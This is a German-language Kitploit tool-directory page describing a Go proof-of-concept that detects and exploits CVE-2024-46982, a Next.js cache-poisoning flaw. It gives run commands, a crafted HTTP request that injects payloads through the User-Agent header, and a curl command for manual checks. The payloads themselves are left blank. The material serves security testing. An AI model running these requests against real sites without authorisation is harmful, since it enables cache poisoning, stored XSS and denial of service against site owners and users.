Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46982 — POC CVE-2024-46982 | Kitploit
Tools/GitHubGitHub/lercas/cve-2024-46982
Vulnerability AnalysisExploitationWeb Application ExploitationWeb Security
GitHublercas/cve-2024-46982

CVE-2024-46982

POC CVE-2024-46982

Repository anzeigen
51vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Next.js Cache-Poisoning-Exploit

Dieses Tool automatisiert die Erkennung und Ausnutzung von CVE-2024-46982, einer Cache-Poisoning-Sicherheitslücke in Next.js, bei der Server-Side-Rendering-Antworten (SSR) fälschlicherweise als Static Site Generation (SSG) zwischengespeichert werden können. Diese Fehlkonfiguration kann zu Stored XSS, DoS und Datenlecks führen, sodass Angreifer bösartige Inhalte in zwischengespeicherte Antworten einschleusen können.

Installation und Verwendung

Ziel-Liste vorbereiten

Erstellen Sie eine Datei mit dem Namen targets.txt, die pro Zeile eine Ziel-URL enthält:

root@kitploit:~
https://vulnerable-site.com
https://another-target.com

Benutzerdefinierte Payloads definieren

Erstellen Sie eine Datei mit dem Namen payloads.txt, die Payloads enthält, die über den User-Agent-Header injiziert werden:

root@kitploit:~

Exploit ausführen

Kompilieren und ausführen des Exploits mit:

root@kitploit:~
go run exploit.go -f targets.txt -p payloads.txt -d 5

Funktionsweise

  • Liest die Liste der Ziel-URLs aus targets.txt
  • Durchläuft jedes Ziel und hängt den verwundbaren Endpunkt an:
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
  • Sendet mehrere Anfragen, die jeweils einen anderen Payload aus payloads.txt verwenden
  • Analysiert die HTTP-Antwort auf Anzeichen einer erfolgreichen Injection:
    • Wenn der Payload im Antworttext erscheint → Das Ziel ist verwundbar
    • Wenn der Antwortcode 200 OK ist und das Caching-Verhalten abnormal ist → Möglicherweise verwundbar
    • Wenn der Antwortcode 403 Forbidden oder 404 Not Found ist → Wahrscheinlich gepatcht
  • Zeigt Ergebnisse nach dem Testen aller Ziele an

Manuelle Überprüfung:

Senden Sie eine bösartige Anfrage mit curl:

root@kitploit:~
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
     -H "User-Agent: " \
     -H "x-now-route-matches: 1"

Rufen Sie den Endpunkt in einem Browser auf

Voraussetzungen

  • Go 1.21 oder neuer.
Tool herunterladen